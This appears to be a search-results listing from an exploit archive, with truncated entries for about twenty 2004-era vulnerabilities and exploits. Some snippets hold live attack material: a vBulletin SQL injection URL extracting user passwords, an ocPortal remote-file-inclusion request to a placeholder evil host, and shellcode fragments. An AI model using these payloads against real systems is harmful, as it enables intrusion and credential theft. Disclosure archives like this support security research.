1697 matches found
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow
source: https://www.securityfocus.com/bid/11977/info Bolthole Filter is prone to a buffer overflow vulnerability. This issue is exposed when the software parses email address data. If successfully exploited, this vulnerability could result in execution of arbitrary code in the context of the...
Active Server Corner ASP Calendar 1.0 - Administrative Access
Active Server Corner ASP Calendar 1.0 - Administrative Access source: https://www.securityfocus.com/bid/11931/info ASP Calendar is reported prone to an unauthorized administrative access vulnerability. An unauthorized remote attacker can access an administrative script and potentially gain...
TipxD 1.1.1 - Not SETUID Local Format String
/ tipxdexp.c TipxD Format String Vulnerability TipxD - SECU No System Group - http://www.nosystem.com.ar / include include define PATH "/bin/tipxd" define OBJDUMP "/usr/bin/objdump" define GREP "/usr/bin/grep" unsigned char shellcode= / aleph1 shellcode.45b /...
F-Secure Policy Manager 5.11 - FSMSH.dll CGI Application Installation Full Path Disclosure
F-Secure Policy Manager 5.11 - FSMSH.dll CGI Application Installation Full Path Disclosure source: https://www.securityfocus.com/bid/11869/info F-Secure Policy Manager includes a CGI application named 'fsmsh.dll'. By supplying unexpected input as an argument to the 'fsmsh.dll' application the...
Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit
Exploit for unknown platform in category dos / poc ========================================================= Jana Server include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include includ...
JSPWiki 2.1 - Cross-Site Scripting
JSPWiki 2.1 - Cross-Site Scripting...
Prozilla 1.3.6 - Remote Stack Overflow
Prozilla 1.3.6 - Remote Stack Overflow / 20/10/2004 This is a private work of Serkan Akpolat [email protected] for the unpublished prozilla-1.3.6 format string/buffer overflow vulnerability , though this version only exploits the stack overflow. Tested against current gentoo/slack/debian/sus...
MS Windows Compressed Zipped Folders Exploit (MS04-034)
Exploit for unknown platform in category remote exploits ======================================================= MS Windows Compressed Zipped Folders Exploit MS04-034 ======================================================= / Microsoft Windows Vulnerability in Compressed zipped Folders MS04-034...
SLMail 5.5 POP3 PASS Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ============================================ SLMail 5.5 POP3 PASS Buffer Overflow Exploit ============================================ SLmail 5.5 POP3 PASS Buffer Overflow Discovered by : Muts Coded by : Muts WWW.WHITEHAT.CO.IL Plain vanill...
vBulletin - 'LAST.php' SQL Injection
Example: http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201 milw0rm.com 2004-11-15...
[Full-Disclosure] [Advisory + Exploit] SlimFTPd <= 3.15
My nice words again are to kotik biatch. clean code on my website. / SlimFTPd = 3.15, Remote Buffer Overflow Exploit v0.1. Bind a shellcode to the port 101. Full disclosure and exploit by class101 at DFind.kd-team.com & n3ws at EFnet 10 november 2004 Thanx to HDMoore and Metasploit.com for their...
CCProxy Log - Remote Stack Overflow
include include include pragma commentlib, "ws232" unsigned char EndChar= "x20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax0Dx0A"; // HTTP/1.0 unsigned char shellcode = "xebx0ex5bx4bx33xc9xb1xfex80x34x0bxeexe2xfaxebx05" "xe8xedxffxffxff" / 254 bytes shellcode, xor with 0xee / / offset 92=IP offset 99=PORT/...
[Full-Disclosure] [Advisory + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit
Hi List, I found yesterday this bug in the last version of MiniShare. This is a simple buffer overflow in the address link. Vendors are contacted at http://minishare.sourceforge.net 1 hour only before the public advisorie. Actually no fix are available. The exploit is available in attachment for...
Apache 2.0.52 Multiple Space Header DoS (c code)
Exploit for unknown platform in category dos / poc ================================================ Apache 2.0.52 Multiple Space Header DoS c code ================================================ /// Apache 2.0.52 and earlier DoS - Chintan Trivedi include "stdafx.h" include "winsock.h" include...
socat <= 1.4.0.2 Local Format String Exploit (not setuid)
Exploit for linux platform in category local exploits ========================================================= socat No System Group - http://www.nosystem.com.ar email protected:$ make socatexp email protected:$ ./socatexp socat shellcode address = 0xbfffffb9 .dtors address = 0x080740c4 2004/10/...
Monit <= 4.2 Basic Authentication Remote Root Exploit
Exploit for linux platform in category remote exploits ===================================================== Monit linuxmailorg - Abhisek Datta abhisekfrontru 06.04.2004 http://www.eos-india.net New Targets : RedHat 9 Fedora Core 2 Slackware 8.1 Update Code :...
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
-- IIS NNTP Service XPAT command heap overflow proof of concept Author: Lucas Lavarello lucas at coresecurity dot com Juliano Rizzo juliano at coresecurity dot com Copyright c 2001-2004 CORE Security Technologies, CORE SDI Inc. All rights reserved. THIS SOFTWARE IS PROVIDED AS IS'' AND ANY EXPRES...
ocPortal 1.0.3 - Remote File Inclusion
ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ?...
Microsoft ASP.NET 1.x - URI Canonicalization Unauthorized Web Access
source: https://www.securityfocus.com/bid/11342/info Microsoft ASP.NET is reported prone to a remote information-disclosure vulnerability because the application fails to properly secure documents when handling malformed URI requests. An attacker may leverage this issue to bypass authentication...
Radmin (Remote Administrator) Port 10002 - Possible GDI Compromise
The remote host is running radmin - a remote administration tool - on port 10002. This indicates that an attacker may have exploited one of the flaws described in MS04-028 with a widely available exploit. As a result, anyone may connect to the remote host and gain control by logging into the remo...